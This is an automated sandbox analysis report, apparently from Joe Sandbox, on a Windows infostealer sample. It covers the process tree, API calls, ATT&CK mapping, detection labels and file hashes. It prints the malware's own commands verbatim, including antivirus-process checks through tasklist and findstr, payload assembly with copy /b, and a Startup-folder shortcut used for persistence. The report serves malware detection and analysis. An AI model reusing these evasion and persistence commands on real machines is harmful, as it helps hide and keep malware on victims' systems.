Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000E5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,10_2_000E5CAC
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_001088CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_001088CD
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000DA354 SetUnhandledExceptionFilter,10_2_000DA354
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000DA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_000DA385
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D8A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00D8A385
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D8A354 SetUnhandledExceptionFilter,15_2_00D8A354
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_00109369 LogonUserW,10_2_00109369
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000C5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_000C5240
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_00111AC6 SendInput,keybd_event,10_2_00111AC6
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_001151E2 mouse_event,10_2_001151E2
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Sunset Sunset.bat & Sunset.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 182349Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "RefundAlienConservativeChapters" Coral Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Cause + ..\Shopper + ..\Edges + ..\Zinc + ..\Correlation + ..\Wearing + ..\Provision + ..\Res lJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif Beginners.pif lJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr "C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr" "C:\Users\user\AppData\Local\TradeOptimize Dynamics\z"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tradehub.url" & echo url="c:\users\user\appdata\local\tradeoptimize dynamics\tradehub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tradehub.url" & exit
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tradehub.url" & echo url="c:\users\user\appdata\local\tradeoptimize dynamics\tradehub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tradehub.url" & exitJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_001088CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_001088CD
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_00114F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,10_2_00114F1C
Source: file.exe, 00000000.00000003.1665758727.0000000002B74000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003755000.00000004.00000800.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000000.1687565395.0000000000166000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Beginners.pif, TradeHub.scrBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000D885B cpuid 10_2_000D885B
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000F0030 GetLocalTime,__swprintf,10_2_000F0030
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000F0722 GetUserNameW,10_2_000F0722
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000E416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,10_2_000E416A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: TradeHub.scrBinary or memory string: WIN_81
Source: TradeHub.scrBinary or memory string: WIN_XP
Source: TradeHub.scrBinary or memory string: WIN_XPe
Source: TradeHub.scrBinary or memory string: WIN_VISTA
Source: TradeHub.scrBinary or memory string: WIN_7
Source: TradeHub.scrBinary or memory string: WIN_8
Source: Sp.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_0012696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,10_2_0012696E
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_00126E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_00126E32
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DD696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,15_2_00DD696E
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DD6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,15_2_00DD6E32
MITRE ATT&CK Matrix (the number in front of a technique is the count of matched signatures for that technique)
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 11 Scripting | 2 Valid Accounts | 1 Windows Management Instrumentation | 11 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 21 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 2 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 21 Input Capture | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Command and Scripting Interpreter | 2 Valid Accounts | 2 Valid Accounts | 2 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | 2 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 17 System Information Discovery | Distributed Component Object Model | Input Capture | 1 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 12 Process Injection | 111 Masquerading | LSA Secrets | 131 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 2 Registry Run Keys / Startup Folder | 2 Valid Accounts | Cached Domain Credentials | 4 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Access Token Manipulation | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Process Injection | Proc Filesystem | 1 System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Behavior Graph ID: 1523781 | Sample: file.exe | Startdate: 02/10/2024 | Architecture: WINDOWS | Score: 92
Signatures on the sample: Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; Sigma detected: Search for Antivirus process; 4 other signatures
DNS: bsQfWYzSEObgoEYPHvZYAafhPH.bsQfWYzSEObgoEYPHvZYAafhPH
file.exe (23) started
    cmd.exe (2) started
        dropped: C:\Users\user\AppData\Local\...\Beginners.pif, PE32
        signature: Drops PE files with a suspicious file extension
        Beginners.pif (4) started
            dropped: C:\Users\user\AppData\Local\...\TradeHub.scr, PE32
            dropped: C:\Users\user\AppData\Local\...\TradeHub.js, ASCII
            signatures: Multi AV Scanner detection for dropped file; Drops PE files with a suspicious file extension
            cmd.exe (2) started
                dropped: C:\Users\user\AppData\...\TradeHub.url, MS
                conhost.exe started
        cmd.exe (2) started
        conhost.exe started
        7 other processes
wscript.exe (1) started
    signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
    TradeHub.scr started
Source | Detection | Scanner | Label
file.exe | 11% | ReversingLabs | Win32.Backdoor.Generic
file.exe | 17% | Virustotal |
file.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | 5% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | 11% | Virustotal |
C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | 5% | ReversingLabs |
C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | 11% | Virustotal |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe
http://www.autoitscript.com/autoit3/J | 0% | Virustotal |
https://www.autoitscript.com/autoit3/ | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bsQfWYzSEObgoEYPHvZYAafhPH.bsQfWYzSEObgoEYPHvZYAafhPH | unknown | unknown | false | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | file.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000000.1687736473.0000000000179000.00000002.00000001.01000000.00000006.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003763000.00000004.00000800.00020000.00000000.sdmp, TradeHub.scr, 0000000F.00000002.3506982744.0000000000E29000.00000002.00000001.01000000.00000008.sdmp, TradeHub.scr.10.dr, Beginners.pif.1.dr, Sp.0.dr | false | | unknown
http://nsis.sf.net/NSIS_ErrorError | file.exe | false | URL Reputation: safe | unknown
https://www.autoitscript.com/autoit3/ | file.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000002.3507516822.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003763000.00000004.00000800.00020000.00000000.sdmp, TradeHub.scr.10.dr, Beginners.pif.1.dr, Sp.0.dr | false | | unknown
No contacted IP infos
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1523781
Start date and time: 2024-10-02 02:29:39 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 6s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal92.expl.evad.winEXE@28/18@2/0
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 101
• Number of non-executed functions: 295
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
01:30:33 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url
20:31:09 | API Interceptor | 6928x Sleep call for process: Beginners.pif modified
20:31:22 | API Interceptor | 6152x Sleep call for process: TradeHub.scr modified
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | file.exe | malicious | Stealc
C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | file.exe | malicious | Stealc
C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | file.exe | malicious | Stealc
C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | file.exe | malicious | Clipboard Hijacker, Vidar
C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | file.exe | malicious | LummaC
C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | file.exe | malicious | Amadey
C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | file.exe | malicious | LummaC, Amadey, LummaC Stealer
C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | file.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | file.exe | malicious | Unknown
C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | file.exe | malicious | Stealc
C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | file.exe | malicious | Stealc
C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | file.exe | malicious | Stealc
C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | file.exe | malicious | Clipboard Hijacker, Vidar
C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | file.exe | malicious | LummaC
C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | file.exe | malicious | Amadey
C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | file.exe | malicious | LummaC, Amadey, LummaC Stealer
C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | file.exe | malicious | Unknown
C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | file.exe | malicious | Unknown
Process: C:\Windows\SysWOW64\cmd.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: modified
Size (bytes): 893608
Entropy (8bit): 6.62028134425878
Encrypted: false
SSDEEP: 12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5: 18CE19B57F43CE0A5AF149C96AECC685
SHA1: 1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256: D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512: A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 5%
• Antivirus: Virustotal, Detection: 11%
Joe Sandbox View:
• Filename: file.exe, Detection: malicious (9 related samples, all with this filename and detection)
Process: C:\Windows\SysWOW64\cmd.exe
File Type: SysEx File - Harmony
Category: dropped
Size (bytes): 527122
Entropy (8bit): 7.99963712608285
Encrypted: true
SSDEEP: 12288:rjHgoZqjIFzXqCQx0xCJXUpjMFMxvrbNotLgiV5aLleFz7:jimXKgBMFYvu9mLUFz7
MD5: 50B908B6812EC7A27452EFE98E5E659F
SHA1: B33663A2FECA423DC0ADD80050D9678044FD52D2
SHA-256: 9A2791A019D3171D07703C70ACEBB39E816B3D57CE49E6C02FE9210A9DF7D601
SHA-512: A13F1CC17B08CF1E7F447ADB3C6D8E103C932B854E560A768ABCA5E832912D1AC29685D04E22B616136DC0A81CF457B99ED1006081A856F3120D0AFEF2C5C8F1
Malicious: false
Process: C:\Users\user\Desktop\file.exe
File Type: SysEx File - Harmony
Category: dropped
Size (bytes): 86016
Entropy (8bit): 7.998064121857301
Encrypted: true
SSDEEP: 1536:rJe+uKCCPCi5zbbkwgAgdZDsqhkB0gIri95wHY+fN6i2sQOrDRupNAOihm:rJhuDSnbbkwgnD0RAkwGsQOrDRunNiA
MD5: A3A0C058FA27C282DDFECE37085FE760
SHA1: 04F1F8820D56B1FA72C19C5197111FBA51ABFD6E
SHA-256: 3705216E098A30F027ADD577D3A497D2CB7FA27309534352DE7BCE0167875414
SHA-512: 3C79041C186AD490BFED2F02049882592E725029E1428275EFABA2FB0D5FE1A7B3B56612725735D3B56F01409B6A0A7AF365FA555AEEC9D43C131F2E15CC65B5
Malicious: false
Process: C:\Users\user\Desktop\file.exe
File Type: data
Category: dropped
Size (bytes): 6227
Entropy (8bit): 6.156814793568254
Encrypted: false
SSDEEP: 192:RHAeOqAFDw09CV/2nPvj6DdMP3r1HI5ja:RHAHhww+/2nlP3r1Wa
MD5: 586888FF131A08B7034564166BA11A5A
SHA1: 2D575C75044DF9A8EBEE229603B37372B1AA82A5
SHA-256: 88E64C43A939C56FC097F90422773152E0E5CF5049F70BD6D3B43554DEA69169
SHA-512: 5FA25A7156620C319D58B073D5306489AAC8608EFA8B8CDA13C8F0A95962241651D71BAD4E4F8693991CAEBE29BCCEC0B30E63DE2F84A8E7A717E1A36A22BCB8
Malicious: false
Process: C:\Users\user\Desktop\file.exe
File Type: data
Category: dropped
Size (bytes): 54272
Entropy (8bit): 7.9967285952850435
Encrypted: true
SSDEEP: 1536:uXvkKuqo9Hwk6yEq8bAYkhS1trRrI/gsp:uhMQjHkhkRrI/gsp
MD5: 2283E9DE63B3209FDAB201D3DA528B4F
SHA1: 5C3591F9137DF4FEB047DFC785D209987A5CC2F2
SHA-256: A74BF119E494A1114E9DA7F45ED44C2898A61DDB5EDD09D95F4A37AFD63874FD
SHA-512: 4C9C5AE9206D86914DBACA0ABFB4C052F2DF1FDC70CACB2450E74BCDBC4C5BC75665BAF0BB08B774C538624B8017A2D5A1083F56267AACFA0022DF7B81036217
Malicious: false
                                        Process:C:\Users\user\Desktop\file.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):59392
                                        Entropy (8bit):7.996722789894868
                                        Encrypted:true
                                        SSDEEP:1536:8/kX8qtLcQLFkQYl2FkY9jivoXeXU5iD48N9NMxpNb0uXIpMUP:CqCQRjLFTMv3XEiDNhadJXMRP
                                        MD5:C2E1FAC85A03CE80A9ABC0B090D40161
                                        SHA1:686253A249487368CFC64B85C35BEC8AE178E192
                                        SHA-256:1D782C2BE3F2CDD2EFBA0BEB21EF8D6C5358CBEC5321B8BD521BFE8EDF8EB499
                                        SHA-512:B6550AA4AFBBA71958257BB4B318BE76158DD22199EBB5BF0DD1582E63EA96BBB4E4B5B0D6AA7E33127A3E0BFDADB6DDA64075D0C968DA074EE825E76EDBC05E
                                        Malicious:false
                                        Preview:.p.6c...8..>.~.T+S,....I.B...~.E.e.uD.fd......s.]|.8.ni....J.QQ.......r^'-...op..{..D.)..&.5-;I%B.B.eY......#..o...b.).....A..i....;.l...d...6k.u..V,.t...o)..^}..\.^>3C~rw..r$.[[[.v.`2...u..1.[.}..X...|..im......oj.E.....tr..4..j..h..Tc...w/....0.nV..=......ID7.3..!./a....R...+.N.=A.Db.L.2~`......[Q..9...*:".l*.`.....V.....G....FZ.g.o.e..H....q&....\q.nX_.,.j.....K.../...{.MM]XfG64.. ....y..-..%m..X[.9....7..X...w...T.3pN..Y.B?..-].5..W.I...V.@..tt...G....R....w... O..C.m...Z8.U+S....9!....M.|.].dB.&..<Za.. .0H..ZKc......~.)..r/W(H.|...@........8"....N7.......7:$..w..S.....V.G$..P....$..A#..n....;.@.......w\.....j.....V&T...".*..h...|..."....w.3.:..#.T...@..C.YK.......I..V4.{.\..LA.o@..`..a.Pm..LZ.V8..V!.....U#..........V...8!....1....'. ...j......a...r.(\.+/_.UB..,^N..Ey...#.<J..K...Jj...E9y.$.|.)(.;.2....:.p.l.X...f..XH.........~z:.}s{.`.bBF8.G..o.....`.F.[......}.c.6......W.M1..LFB.P....Nt.J...F0....|...[....T........8..#e...(l^.D.......
                                        Process:C:\Users\user\Desktop\file.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):73728
                                        Entropy (8bit):7.99774088264502
                                        Encrypted:true
                                        SSDEEP:1536:8S8RQa9F+D5lNOj7OaA9K86hQ1mFKCTc+MdESwcGs17aJRDA4c4zQ6V9q:18RQpl0CaAL0sCo+oEwN5a3AW99q
                                        MD5:ED4544D1921DABCD6BC688B4D86806B0
                                        SHA1:18E39151B72F359670B6D8BCFF72D18421462EC0
                                        SHA-256:811858150E1DC0E294F5592B1795D17B498B60FFE3F3132FD35334846BDF2332
                                        SHA-512:E23317B53D5F5109754B872FFC1AE3CCE45C03A4776C0D2C4DD0B6BF6B653F4152B864BC2350C0A24108EC055010EE79AAF3FB6CDFA8A32D9147428D588E5808
                                        Malicious:false
                                        Preview:.......uPN.va.....9.G.X...K..).A..'../.n.......t....2b-..Sg{.Y.qw.%..O.Uu..gp.p.WFlQ.v|.V..m.. ...m....|a......%...gZ.<y'.Je..X....7.Q.n....^.b....H....X6<....q<.0.!...r.........Z.Y...[..GX].4,/@3.........5.mO...>n.`...g..|P.P.....G)..`....Joi4J......u.d.P....I.1..f.../x.q.E....7..3.d..L.....:...UNM.i.d.K{..1 ..A.8..^..6.....h^.B.......`.1.....c.?.3id.P..-.j.q.~.5T....B... ...............5?.'...^.f..=S..P...tnR..$~0*..|.v8.........(.w...^.........m1.?c....WX.O.+.Z9Np..A.....=..am...}.'m.-hk."...}.{.7.@...B..#........V.....1......'.pV...ClQ.#.D.2..wy....8..X6_k...K.(".h.....z...F..~.?j..1.u.r.C*>/9]oX.*.U..dm......"...=!...$|..W.....m~.-.&.......m....IS..@hajR.U...N...o.b*..hV".F..C+.A...=$#..%.>W...Q.......c"0.....\#..,H...iU.oXg....i.G.>eq...2x..E.c^.|..?.q..\r...*. p_D.F.;...x.D......Trw.d...g.\.........8.?_.e4N..l..K......~.....g..\.oq9Bx..5..[s.z.i.~..A....,y0..*..JQ....I...7......W.. 1...h...6..*m...*....)..!.:...q[.....I....:.o.........{
                                        Process:C:\Users\user\Desktop\file.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):73490
                                        Entropy (8bit):7.9976190001675365
                                        Encrypted:true
                                        SSDEEP:1536:TsVoWjFsn8pt8MUrWyBTF335Z7YWqDFvzq:qtRy85yBTF3pZ7uF7q
                                        MD5:EE279B19BD2CEDF37A3C31F3C8351BDD
                                        SHA1:DA041FA6C7A03B6BB10E9C1933D0277E66C7E40E
                                        SHA-256:5271BC66E8EEAA3715A070B20FADE6F0CAAF7D752E0991F62C825528A967477F
                                        SHA-512:E7CA640DE773463389B5CDA7904A84092B9919472418D8D70171DE8C1B212F324102191463A3E78A4506D62403C081DE5B04259198223787B165EEB33C632A01
                                        Malicious:false
                                        Preview:4.`B.^..Q..y...L.s../z..k|.)..U.......u.O...k:Q..d.@.aH.c.!.+/.N....[$....^7kRNb.....m.m......B>....c.O\..N`K].....e.s%g... ...h......Q....XL...`..du*..e6.Vw....b.h.C..A..D....B....Z..Q.....|...m"@O$DqkRdZ1=I...a.%i..Y.xM.j.V.Tx..x..;...0._..{.H........B.u..1...>...m.&@B...3..F.w.rx......?}..(HD...])v...;;.o@(Wc../s\..r..~T...T0...........................c....`a.`..{.K...>.8+sMqw.]...ky....z.....Z..I.OF. ...$.......n...~'..Qg......]......O...|.j.f...^.R.y..vZ4m.MX.sga.a...:.7. ..?........x....(KGL..Xl"f..3-d...6.w/|?...mQ.^...%..i.2|..%......*......v...l...[..a}.7./.....S.......+Qb%;>.;.....d.DA.....?a.o....8ge"...2...N2oxE{....Vx.T.:.(.hl...T.}..;.x....b G...Kcsh{..1.(..g}...=.8..@.9h.....8d.....sa2.l..:..`f.%..1%..&5e.}.........RS...k..[..<..r.UQA|.2....YJX.#.Z.K..b...`..\.sY.....|%..1l..48q.W.1V.j.Yi....<*;...xY..p.sd......R.,.f....)?.C'....0}....,...f74..1........<+......r...4..[Ar#c^..,d.@W.<*. W...8.8]GNEJ.sj..@<..O....6..5
                                        Process:C:\Users\user\Desktop\file.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64512
                                        Entropy (8bit):7.997525836643679
                                        Encrypted:true
                                        SSDEEP:1536:0Xa55zbh0X659QMqc7Xfo0WPqwp4aPrEC1ukgym/qdC92gtZboV9:0sz10899qc7PmPBp4mIy7dwtBoV9
                                        MD5:2ACD12DB6B62B47D2598B6066A2F81BD
                                        SHA1:016ACA07326869D67CC47B7E19DB07B3FB4EA21D
                                        SHA-256:BC044654C2874B7CAE22675F671023E86F5E7281942DC14EDA6BCFAF9463BFA4
                                        SHA-512:BC8F9A21109452B4E3655B22CC5702BDED9B59E459C1EBDF2B50B89BCAEF31D663BF27CDB32725BF0824FA1FEB7ECAB1D74A16475B2B120E1E7D7B70ACDF5D1B
                                        Malicious:false
